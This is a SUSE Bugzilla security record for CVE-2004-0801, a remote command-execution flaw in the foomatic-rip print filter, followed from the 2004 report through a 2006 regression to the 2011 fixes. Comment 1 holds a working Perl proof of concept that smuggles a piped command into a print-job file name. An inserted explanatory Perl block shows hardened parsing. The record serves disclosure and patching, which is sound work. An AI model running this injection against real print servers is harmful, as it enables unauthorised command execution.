Bug 59233 - (CVE-2004-0801) VUL-0: CVE-2004-0801: remote command execution in foomatic-rip-hplip
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: General
Version: unspecified
Hardware: All
OS: Linux
Priority: P2 - High
Severity: Major
Target Milestone: ---
Assigned To: Security Team bot
E-mail List
maint:released:11.3:42630 maint:relea...
Depends on:
Blocks:
Reported: 2004-08-25 22:41 UTC by Sebastian Krahmer
Modified: 2019-05-01 15:20 UTC

See Also:
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
the fix which came via vendor-sec (8.65 KB, patch)
2004-08-27 16:58 UTC, Sebastian Krahmer
patchinfo 8.1,8.2 (795 bytes, text/plain)
2004-08-31 17:51 UTC, Ludwig Nussel
patchinfo 9.0, 9.1 (834 bytes, text/plain)
2004-08-31 17:52 UTC, Ludwig Nussel
patchinfo sles8 (623 bytes, text/plain)
2004-08-31 17:52 UTC, Ludwig Nussel
patchinfo sles9 (630 bytes, text/plain)
2004-08-31 17:53 UTC, Ludwig Nussel

Description Sebastian Krahmer 2004-08-25 22:41:30 UTC
The foomatic-rip filter is horrible code, security wise.
It allows for executing arbitrary commands.
Attackers need printing access.
Comment 1 Sebastian Krahmer 2004-08-25 22:41:30 UTC
On the CUPS server, execute:

#!/usr/bin/perl

# CUPS PoC remote exploit, requires printing access.
# Bug is in the foomatic-rip perl script. It opens PPD files
# without < so if there's a | at the end, it interprets them
# as a command. Furthermore, the arguments for the script are
# merged into one string and afterwards regexed out. This allows
# for faking arguments via filenames.

my $ip = "127.0.0.1";
my $ppd_file =  "\x01-p\x01|\$(find)|\x01x";
open O, ">$ppd_file" or die $!;
print O "Foo!\n";
close O;

exec("lpr", "./$ppd_file");

And see whether a "find" command is started by the cups server afterwards.
Tested on a SL 8.2, but the current foomatic-rip script seems to be the same
and still contains the bugs.
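The two coding patterns the report calls out (a two-argument open() on a PPD whose name comes from the job, and options regexed back out of one joined argument string) beside their hardened forms, as an added Perl example that is not code from the bug report or from foomatic-rip; read_ppd, parse_job_args and the temporary files are assumed names constructed here.

```perl
#!/usr/bin/perl
# Added example (not from the bug report or foomatic-rip): the two habits
# the report describes, each next to the form that closes the hole.
use strict;
use warnings;
use File::Temp qw(tempdir);
use Getopt::Long qw(GetOptionsFromArray);

# (1) Opening a PPD. A two-argument open($fh, $name) lets Perl parse the
# name: a trailing '|' makes it a pipe and runs the rest as a shell command.
# Three-argument open with an explicit '<' mode never parses the name.
sub read_ppd {
    my ($path) = @_;
    # Belt and braces on top of the 3-arg open: a PPD path derived from a
    # print job should never contain a pipe, redirection or control bytes.
    return undef if $path =~ /[|<>;&`\x00-\x1f]/;
    open(my $fh, '<', $path) or return undef;
    my @lines = <$fh>;
    close $fh;
    return \@lines;
}

# (2) Option handling. foomatic-rip joined its arguments into one string and
# regexed the options back out, so a filename containing "-p" looked like the
# -p option. Parsing the argument list element by element keeps a filename
# that merely contains "-p" from being taken as an option.
sub parse_job_args {
    my @argv = @_;
    my %opt;
    GetOptionsFromArray(\@argv, 'p=s' => \$opt{ppd}) or return undef;
    $opt{file} = shift @argv;
    return \%opt;
}

my $dir  = tempdir(CLEANUP => 1);
my $good = "$dir/printer.ppd";
open(my $w, '>', $good) or die $!;
print $w "*PPD-Adobe: \"4.3\"\n*ModelName: \"Example\"\n";
close $w;

# Constructed names of the shape in the report; the pipe target is harmless.
my $piped = "$dir/x|echo injected";
my $fake  = "\x01-p\x01$piped\x01x";

printf "read_ppd(good):  %s\n", defined read_ppd($good)  ? 'ok' : 'refused';
printf "read_ppd(piped): %s\n", defined read_ppd($piped) ? 'ok' : 'refused';
my $o = parse_job_args('-p', $good, $fake);
printf "ppd=%s; filename containing -p stayed a plain filename: %s\n",
    $o->{ppd}, ($o->{file} eq $fake ? 'yes' : 'no');
```

Expected: the genuine PPD reads ok, the pipe-bearing name is refused, and the job file whose name embeds "-p" is kept as the file argument rather than being parsed as an option.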
Comment 2 Klaus Singvogel 2004-08-26 22:51:36 UTC
Patches made and new packages submitted.
Please note that this affects package cups (<= SL9.0) and later
foomatic-filters (SL9.1, SL9.2)

Security-team, please handle the rest of the update process: putonftp, etc.

Affected are all SUSE Linux versions.
Comment 3 Sebastian Krahmer 2004-08-27 16:38:23 UTC
CAN-2004-0801
Comment 4 Sebastian Krahmer 2004-08-27 16:58:28 UTC
Created attachment 22980 [details]
the fix which came via vendor-sec

...
Comment 5 Marcus Meissner 2004-08-30 19:41:31 UTC
CRD around Sept. 7, 2004.
Comment 6 Marcus Meissner 2004-08-30 19:42:43 UTC
From vendor-sec CRD summary:

CAN-2004-0801       foomatic            Sep 14 ????UTC(*3)
CAN-2004-0558       CUPS(*1)            Sep 06 ????UTC

*1: this cups issue seems to be a mess, from what I've seen, upstream is
going to release information for this issue on Sept 1, then 1.1.21 should
come out on Sept 7, some on the list seem to think we're releasing on Sept
06.  The foomatic issue will probably dictate this since it's a bit higher
priority.

*3: These are suggested release dates, if these are problems for anyone, you
should probably speak up.
Comment 7 Klaus Singvogel 2004-08-30 19:52:12 UTC
Working again on a solution which covers the vendor-sec patches.
Have to adapt the patches to the old versions of foomatic-rip and its
predecessor cupsomatic.
Wait with tests till I'm ready, please.
Comment 8 Klaus Singvogel 2004-08-31 01:25:12 UTC
Finished with the patches (again :-)
Security-team, please proceed in the usual way.

Patch-Management:
Please check if printing with non-PostScript printers in older SuSE Linux
versions is still possible. Didn't have time to install and test these
versions, and the patches differ! TIA
Comment 9 Ludwig Nussel 2004-08-31 17:51:59 UTC
Created attachment 23054 [details]
patchinfo 8.1,8.2
Comment 10 Ludwig Nussel 2004-08-31 17:52:15 UTC
Created attachment 23055 [details]
patchinfo 9.0, 9.1
Comment 11 Ludwig Nussel 2004-08-31 17:52:46 UTC
Created attachment 23056 [details]
patchinfo sles8
Comment 12 Ludwig Nussel 2004-08-31 17:53:03 UTC
Created attachment 23057 [details]
patchinfo sles9
Comment 13 Sebastian Krahmer 2004-09-15 23:11:00 UTC
advisories and packages are out
Comment 14 Marcus Meissner 2006-05-16 09:58:49 UTC
The foomatic fix was reverted and is not in the current packages!
Affected: 9.3, 10.0 and 10.1
Not Affected: SLES9, 9.2

So those are still exploitable by this problem.
Comment 15 Marcus Meissner 2006-05-19 12:59:50 UTC
critical.
Comment 16 Klaus Singvogel 2006-05-23 19:10:47 UTC
Fixed packages submitted for: 9.3, 10.0, 10.1 and STABLE.
Security-team, please handle the rest of the process: swamp-id, patchinfo, etc. TIA
Comment 17 Marcus Meissner 2006-05-24 08:59:56 UTC
swamp: 4432
Comment 18 Marcus Meissner 2006-05-29 11:57:17 UTC
approved the update. thanks!
Comment 19 Thomas Biege 2009-10-13 19:49:02 UTC
CVE-2004-0801: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Comment 21 Swamp Workflow Management 2011-08-08 14:55:33 UTC
The SWAMPID for this issue is 42548.
This issue was rated as moderate.
Please submit fixed packages until 2011-08-22.
When done, please reassign the bug to security-team@suse.de.
Patchinfo will be handled by security team.
Comment 22 Johannes Meixner 2011-08-09 13:38:05 UTC
FYI regarding SLE11-SP2:
Submitted HPLIP 3.11.5 to SUSE:SLE-11-SP2:GA
via submitrequest 14060:
Version upgrade to HPLIP 3.11.5 (Fate #312667)
plus fixed CVE-2011-2697 (Bug #698451) plus
fixed leftover in CVE-2004-0801 (Bug #59233).
Comment 26 Johannes Meixner 2011-08-10 13:11:57 UTC
Submitted hplip to SUSE:SLE-11-SP1:Update:Test
via submitrequest 14078:
Fixed CVE-2011-2697 (bnc#698451) plus
fixed leftover in CVE-2004-0801 (bnc#59233)
Comment 27 Johannes Meixner 2011-08-10 13:15:04 UTC
From my point of view the issue is now fixed
in all maintained SLE products.
Comment 28 Johannes Meixner 2011-08-11 15:05:08 UTC
Submitted hplip to openSUSE:11.3:Update:Test
via submitrequest 78534:
  Fixed CVE-2011-2697 (bnc#698451) plus
  fixed leftover in CVE-2004-0801 (bnc#59233)
Comment 29 Johannes Meixner 2011-08-11 15:25:56 UTC
Submitted hplip to openSUSE:11.4:Update:Test
via submitrequest 78539:
  Fixed CVE-2011-2697 (bnc#698451) plus
  fixed leftover in CVE-2004-0801 (bnc#59233)
Comment 30 Johannes Meixner 2011-08-11 15:26:39 UTC
From my point of view the issue is now fixed
in all maintained products.
Comment 31 Johannes Meixner 2011-08-11 15:28:32 UTC
Reopening and reassigning to security-team@suse.de
according to comment #21.
Comment 32 Johannes Meixner 2011-08-12 12:22:16 UTC
FYI regarding openSUSE:Factory:

Fixed via version upgrade to current HPLIP 3.11.7
and changes to avoid the security issues.

Submitted HPLIP 3.11.7 to the
OBS Printing project via submitrequest 78629 and to
openSUSE:Factory via submitrequest 78646:
  Version upgrade to HPLIP 3.11.7 and
  avoid CVE-2011-2697 (bnc#698451)
  plus CVE-2004-0801 (bnc#59233)
  by no longer installing foomatic-rip-hplip and
  using foomatic-rip from the foomatic-filters RPM instead

From my point of view the issue is now completely
fixed in all products.
Comment 33 Thomas Biege 2011-08-12 12:49:00 UTC
Thanks.
Comment 34 Swamp Workflow Management 2011-08-25 11:44:53 UTC
Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs, hplip-hpijs-debuginfo
Products:
openSUSE 11.3 (debug, i586, x86_64)
openSUSE 11.4 (debug, i586, x86_64)
Comment 35 Swamp Workflow Management 2011-08-25 14:03:10 UTC
Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs
Products:
SLE-DEBUGINFO 11-SP1 (i386, ia64, ppc64, s390x, x86_64)
SLE-DESKTOP 11-SP1 (i386, x86_64)
SLE-SERVER 11-SP1 (i386, ia64, ppc64, s390x, x86_64)
SLE-SERVER 11-SP1-TERADATA (x86_64)
SLES4VMWARE 11-SP1 (i386, x86_64)
Comment 36 Marcus Meissner 2011-09-16 13:05:44 UTC
Seems we can close it.
Comment 38 Bernhard Wiedemann 2016-04-15 10:57:44 UTC
This is an autogenerated message for OBS integration:
This bug (59233) was mentioned in
https://build.opensuse.org/request/show/78534 11.3:Test / hplip
https://build.opensuse.org/request/show/78539 11.4:Test / hplip
https://build.opensuse.org/request/show/78646 Factory / hplip